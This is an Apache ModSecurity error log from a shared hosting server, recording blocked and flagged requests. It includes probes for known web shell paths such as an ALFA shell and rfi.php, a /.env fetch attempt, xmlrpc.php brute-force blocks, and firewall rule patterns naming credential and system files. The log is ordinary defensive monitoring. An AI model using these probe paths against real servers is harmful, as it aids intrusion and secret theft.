[Tue May 26 16:26:46.721085 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:50868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV8bu2GQ_TLE_VHIp2mjwAAAN0"]
[Tue May 26 16:26:46.721164 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:50868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV8bu2GQ_TLE_VHIp2mjwAAAN0"]
[Tue May 26 16:26:47.352362 2026] [security2:error] [pid 795941:tid 796189] [client 20.226.60.108:27287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV8b-2GQ_TLE_VHIp2mngAAAPs"]
[Tue May 26 16:26:47.352499 2026] [security2:error] [pid 795941:tid 796189] [client 20.226.60.108:27287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV8b-2GQ_TLE_VHIp2mngAAAPs"]
[Tue May 26 16:26:47.429940 2026] [security2:error] [pid 795941:tid 796141] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8bu2GQ_TLE_VHIp2mjgAAAMs"]
[Tue May 26 16:26:47.803490 2026] [security2:error] [pid 795941:tid 796074] [client 147.92.52.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8b-2GQ_TLE_VHIp2mqwAAAIg"], referer: https://www.anujtradingco.com/
[Tue May 26 16:26:47.841303 2026] [security2:error] [pid 795941:tid 796197] [client 20.226.60.108:2587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahV8b-2GQ_TLE_VHIp2mrwAAAQM"]
[Tue May 26 16:26:47.841431 2026] [security2:error] [pid 795941:tid 796197] [client 20.226.60.108:2587] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahV8b-2GQ_TLE_VHIp2mrwAAAQM"]
[Tue May 26 16:26:48.294309 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:18471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/byp.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2mvgAAANs"]
[Tue May 26 16:26:48.294406 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:18471] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/byp.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2mvgAAANs"]
[Tue May 26 16:26:48.811126 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:26445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/index.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2mxQAAAN0"]
[Tue May 26 16:26:48.811246 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:26445] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/index.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2mxQAAAN0"]
[Tue May 26 16:26:49.076509 2026] [security2:error] [pid 795941:tid 796188] [client 147.92.52.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2mzgAAAPo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 16:26:49.232866 2026] [security2:error] [pid 795941:tid 796130] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8cO2GQ_TLE_VHIp2muQAAAMA"]
[Tue May 26 16:26:49.350352 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:25908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/index/chosen.php"] [unique_id "ahV8ce2GQ_TLE_VHIp2m3wAAAM4"]
[Tue May 26 16:26:49.350476 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:25908] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/index/chosen.php"] [unique_id "ahV8ce2GQ_TLE_VHIp2m3wAAAM4"]
[Tue May 26 16:26:50.036155 2026] [security2:error] [pid 795941:tid 796183] [client 20.226.60.108:57729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/about/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m6QAAAPU"]
[Tue May 26 16:26:50.036276 2026] [security2:error] [pid 795941:tid 796183] [client 20.226.60.108:57729] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/about/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m6QAAAPU"]
[Tue May 26 16:26:50.481915 2026] [security2:error] [pid 795941:tid 796087] [client 20.226.60.108:53275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/as/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m7gAAAJU"]
[Tue May 26 16:26:50.482014 2026] [security2:error] [pid 795941:tid 796087] [client 20.226.60.108:53275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/as/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m7gAAAJU"]
[Tue May 26 16:26:50.968934 2026] [security2:error] [pid 795941:tid 796139] [client 20.226.60.108:29125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m-gAAAMk"]
[Tue May 26 16:26:50.969044 2026] [security2:error] [pid 795941:tid 796139] [client 20.226.60.108:29125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file/chosen.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m-gAAAMk"]
[Tue May 26 16:26:51.544375 2026] [security2:error] [pid 795941:tid 796178] [client 20.226.60.108:25877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/chosen/chosen.php"] [unique_id "ahV8c-2GQ_TLE_VHIp2nDgAAAPA"]
[Tue May 26 16:26:51.544493 2026] [security2:error] [pid 795941:tid 796178] [client 20.226.60.108:25877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/chosen/chosen.php"] [unique_id "ahV8c-2GQ_TLE_VHIp2nDgAAAPA"]
[Tue May 26 16:26:51.632301 2026] [security2:error] [pid 795941:tid 796194] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8cu2GQ_TLE_VHIp2m9QAAAQA"]
[Tue May 26 16:26:52.015751 2026] [security2:error] [pid 795941:tid 796112] [client 20.226.60.108:57768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css/chosen.php"] [unique_id "ahV8dO2GQ_TLE_VHIp2nGAAAAK4"]
[Tue May 26 16:26:52.015856 2026] [security2:error] [pid 795941:tid 796112] [client 20.226.60.108:57768] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css/chosen.php"] [unique_id "ahV8dO2GQ_TLE_VHIp2nGAAAAK4"]
[Tue May 26 16:26:52.587087 2026] [security2:error] [pid 795941:tid 796086] [client 20.226.60.108:18463] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ALFA_DATA/alfacgiapi/perl.alfa"] [unique_id "ahV8dO2GQ_TLE_VHIp2nJQAAAJQ"]
[Tue May 26 16:26:53.196916 2026] [security2:error] [pid 795941:tid 796095] [client 20.226.60.108:25912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV8de2GQ_TLE_VHIp2nLQAAAJ0"]
[Tue May 26 16:26:53.318690 2026] [core:error] [pid 795941:tid 796041] [remote 74.7.241.42:41254] AH10244: invalid URI path (/wp-content/plugins/studio-fifty-core/elements/js/min/%url%), referer: https://www.kardashevtechnologies.com/wp-content/plugins/studio-fifty-core/elements/js/min/magnific-popup.min.js?ver=1.0.2
[Tue May 26 16:26:53.379143 2026] [security2:error] [pid 795941:tid 796104] [client 20.226.60.108:18463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/date.php"] [unique_id "ahV8de2GQ_TLE_VHIp2nOgAAAKY"]
[Tue May 26 16:26:53.379260 2026] [security2:error] [pid 795941:tid 796104] [client 20.226.60.108:18463] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/date.php"] [unique_id "ahV8de2GQ_TLE_VHIp2nOgAAAKY"]
[Tue May 26 16:26:53.784154 2026] [security2:error] [pid 795941:tid 796183] [client 20.226.60.108:24440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/pomo.php"] [unique_id "ahV8de2GQ_TLE_VHIp2nTgAAAPU"]
[Tue May 26 16:26:53.784289 2026] [security2:error] [pid 795941:tid 796183] [client 20.226.60.108:24440] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/pomo.php"] [unique_id "ahV8de2GQ_TLE_VHIp2nTgAAAPU"]
[Tue May 26 16:26:54.249706 2026] [security2:error] [pid 795941:tid 796096] [client 20.226.60.108:22760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV8du2GQ_TLE_VHIp2nWwAAAJ4"]
[Tue May 26 16:26:54.249849 2026] [security2:error] [pid 795941:tid 796096] [client 20.226.60.108:22760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV8du2GQ_TLE_VHIp2nWwAAAJ4"]
[Tue May 26 16:26:54.553700 2026] [security2:error] [pid 795941:tid 796175] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8de2GQ_TLE_VHIp2nRgAAAO0"]
[Tue May 26 16:26:54.761319 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:27325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/t/rfi.php"] [unique_id "ahV8du2GQ_TLE_VHIp2nbwAAANs"]
[Tue May 26 16:26:54.761439 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:27325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/t/rfi.php"] [unique_id "ahV8du2GQ_TLE_VHIp2nbwAAANs"]
[Tue May 26 16:26:55.510674 2026] [security2:error] [pid 795941:tid 796163] [client 176.65.139.236:40338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "velanstore.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahV8d-2GQ_TLE_VHIp2nggAAAOE"]
[Tue May 26 16:26:55.564887 2026] [security2:error] [pid 795941:tid 796136] [client 20.226.60.108:25904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sendmail.php"] [unique_id "ahV8d-2GQ_TLE_VHIp2ngwAAAMY"]
[Tue May 26 16:26:55.565005 2026] [security2:error] [pid 795941:tid 796136] [client 20.226.60.108:25904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sendmail.php"] [unique_id "ahV8d-2GQ_TLE_VHIp2ngwAAAMY"]
[Tue May 26 16:26:55.606175 2026] [security2:error] [pid 795941:tid 796172] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8du2GQ_TLE_VHIp2nYgAAAOo"]
[Tue May 26 16:26:57.462760 2026] [security2:error] [pid 795941:tid 796014] [remote 74.7.241.58:57782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV8ee2GQ_TLE_VHIp2nrwAAmkg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:26:57.602762 2026] [security2:error] [pid 795941:tid 796132] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8eO2GQ_TLE_VHIp2nogAAAMI"]
[Tue May 26 16:26:57.664995 2026] [security2:error] [pid 795941:tid 796118] [client 172.224.240.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV8ee2GQ_TLE_VHIp2nsgAAALQ"]
[Tue May 26 16:26:59.332443 2026] [security2:error] [pid 795941:tid 796035] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8e-2GQ_TLE_VHIp2n4AAAx10"]
[Tue May 26 16:26:59.332617 2026] [security2:error] [pid 795941:tid 796137] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8e-2GQ_TLE_VHIp2n4AAAx10"]
[Tue May 26 16:26:59.416268 2026] [security2:error] [pid 795941:tid 796076] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8eu2GQ_TLE_VHIp2n1QAAAIo"]
[Tue May 26 16:27:01.187984 2026] [security2:error] [pid 795941:tid 796096] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8fO2GQ_TLE_VHIp2n-wAAAJ4"]
[Tue May 26 16:27:02.085435 2026] [security2:error] [pid 795941:tid 796135] [client 14.229.251.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahV8e-2GQ_TLE_VHIp2n3wAAxVI"]
[Tue May 26 16:27:03.574728 2026] [security2:error] [pid 795941:tid 796196] [client 216.213.29.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8f-2GQ_TLE_VHIp2oOQAAAQI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:27:03.670907 2026] [security2:error] [pid 795941:tid 796090] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8f-2GQ_TLE_VHIp2oKwAAAJg"]
[Tue May 26 16:27:04.239962 2026] [security2:error] [pid 795941:tid 796121] [client 46.138.250.165:50750] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "jkjuice.com"] [uri "/"] [unique_id "ahV8gO2GQ_TLE_VHIp2oSAAAALc"]
[Tue May 26 16:27:04.932968 2026] [security2:error] [pid 795941:tid 796135] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8gO2GQ_TLE_VHIp2oUAAAAMU"]
[Tue May 26 16:27:05.191552 2026] [security2:error] [pid 795941:tid 796083] [client 216.213.29.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8ge2GQ_TLE_VHIp2oZQAAAJE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1458576&moderation-hash=3e3a66620389b04ee306eaf0fa643afd
[Tue May 26 16:27:06.412339 2026] [security2:error] [pid 795941:tid 796155] [client 114.119.158.74:41817] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV8gu2GQ_TLE_VHIp2ojgAAANk"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-01-02
[Tue May 26 16:27:07.629371 2026] [security2:error] [pid 795941:tid 796123] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8gu2GQ_TLE_VHIp2okwAAALk"]
[Tue May 26 16:27:09.524906 2026] [security2:error] [pid 795941:tid 796158] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8hO2GQ_TLE_VHIp2otwAAANw"]
[Tue May 26 16:27:09.914080 2026] [security2:error] [pid 795941:tid 796183] [client 45.152.51.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8hO2GQ_TLE_VHIp2owQAAAPU"]
[Tue May 26 16:27:11.771561 2026] [security2:error] [pid 795941:tid 796097] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8hu2GQ_TLE_VHIp2o6gAAAJ8"]
[Tue May 26 16:27:13.951383 2026] [security2:error] [pid 795941:tid 796182] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ie2GQ_TLE_VHIp2pFwAAAPQ"]
